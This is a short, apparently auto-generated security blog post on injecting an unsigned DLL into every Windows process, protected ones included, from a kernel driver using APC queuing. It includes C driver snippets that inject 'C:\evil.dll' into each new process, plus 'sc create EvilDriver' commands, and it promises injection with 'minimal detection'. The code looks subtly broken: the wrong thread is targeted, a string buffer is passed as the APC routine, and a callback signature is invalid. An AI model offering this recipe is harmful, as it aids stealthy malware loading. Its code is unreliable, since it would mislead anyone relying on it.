Listen to this Post
DLL injection is a common technique used to load a dynamic-link library (DLL) into the address space of another process. A more advanced method involves injecting a DLL from a kernel-mode driver into all processes—including protected ones—using Asynchronous Procedure Call (APC) injection. This technique loads the DLL before kernel32.dll, bypassing certain security checks, even if the DLL is unsigned.
Key Resources:
You Should Know:
How APC Injection Works
APC injection forces a target thread to execute malicious code by queuing a user-mode APC. When executed from a driver, this method can bypass some protections.
Steps for Driver-Based APC Injection
- Write a Kernel Driver – The driver must queue APCs to target processes.
- Locate Target Processes – Enumerate processes using
PsSetCreateProcessNotifyRoutine. - Allocate Memory in Target Process – Use `ZwAllocateVirtualMemory` to allocate memory.
- Write DLL Path – Use `ZwWriteVirtualMemory` to write the DLL path into the target.
- Queue APC – Use `KeInitializeApc` and `KeInsertQueueApc` to execute the injection.
Example Code Snippets
Kernel Driver (C) – APC Injection
NTSTATUS InjectDLL(PEPROCESS TargetProcess, PUNICODE_STRING DllPath) {
PKAPC Apc = ExAllocatePool(NonPagedPool, sizeof(KAPC));
if (!Apc) return STATUS_INSUFFICIENT_RESOURCES;
KeInitializeApc(
Apc,
KeGetCurrentThread(),
OriginalApcEnvironment,
&ApcKernelRoutine,
NULL,
(PKNORMAL_ROUTINE)DllPath->Buffer,
UserMode,
NULL
);
KeInsertQueueApc(Apc, NULL, NULL, IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
Finding Processes to Inject
NTSTATUS ProcessCallback(
HANDLE ParentId,
HANDLE ProcessId,
BOOLEAN Create
) {
if (Create) {
PEPROCESS Process;
PsLookupProcessByProcessId(ProcessId, &Process);
InjectDLL(Process, &L"C:\evil.dll");
}
return STATUS_SUCCESS;
}
Bypassing Protections
- No Signature Check: Since the injection happens before `kernel32.dll` loads, some signature checks are bypassed.
- Protected Processes: Works on most protected processes except `smss.exe` (Session Manager).
What Undercode Say
APC injection from a driver is a powerful technique for stealthy DLL loading, but it requires deep kernel access. Security solutions like PatchGuard (on x64 Windows) and Driver Signature Enforcement (DSE) can block such methods. Always test in controlled environments and consider ethical implications.
Related Commands & Tools
- Windows Debugging:
sc create EvilDriver binPath= C:\drivers\evil.sys type= kernel sc start EvilDriver
- Process Explorer: Verify loaded DLLs.
- WinDbg: Debug kernel-mode drivers.
!process 0 0 smss.exe .reload /user
Expected Output:
A functional kernel driver that injects a DLL into all user-mode processes, excluding smss.exe, with minimal detection.
Prediction
As kernel protections improve (e.g., HVCI, VBS), driver-based injection will become harder, pushing attackers toward firmware/hypervisor-level exploits.
References:
Reported By: Alex S – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
